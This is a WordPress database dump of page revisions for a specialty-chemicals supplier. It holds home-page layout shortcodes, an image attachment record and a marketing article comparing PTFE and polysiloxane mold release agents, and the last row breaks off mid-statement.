INSERT INTO `wp_posts` VALUES (1587, 2, '2016-09-13 12:46:54', '2016-09-13 12:46:54', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:46:54', '2016-09-13 12:46:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1588, 2, '2016-09-13 12:56:32', '2016-09-13 12:56:32', '', 'fluoro-extreme-logo', '', 'inherit', 'open', 'closed', '', 'fluoro-extreme-logo', '', '', '2016-09-13 12:56:32', '2016-09-13 12:56:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/fluoro-extreme-logo.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1589, 2, '2016-09-13 12:57:27', '2016-09-13 12:57:27', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><em>Quality &amp; Service</em></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1578"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:57:27', '2016-09-13 12:57:27', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1590, 2, '2016-09-13 13:02:47', '2016-09-13 13:02:47', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><em>Quality &amp; Service</em></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1578"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 13:02:47', '2016-09-13 13:02:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1591, 3, '2016-09-13 13:03:05', '2016-09-13 13:03:05', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate.  These agents facilitate separation of the cured, finished part from the mold, and without such a barrier molding substrates will fuse to the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical that  engineers understand what types of  mold release agents are available and which form would compliment their production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower for the sacrifiscal and PVS release agents, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding constant,efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-13 13:03:05', '2016-09-13 13:03:05', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1592, 3, '2016-09-13 13:09:10', '2016-09-13 13:09:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\r\n[divider]\r\n<h1>ReleaSys<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 13:09:10', '2016-09-13 13:09:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1593, 3, '2016-09-13 13:30:39', '2016-09-13 13:30:39', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\r\n[divider]\r\n<h1>ReleaSys<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button 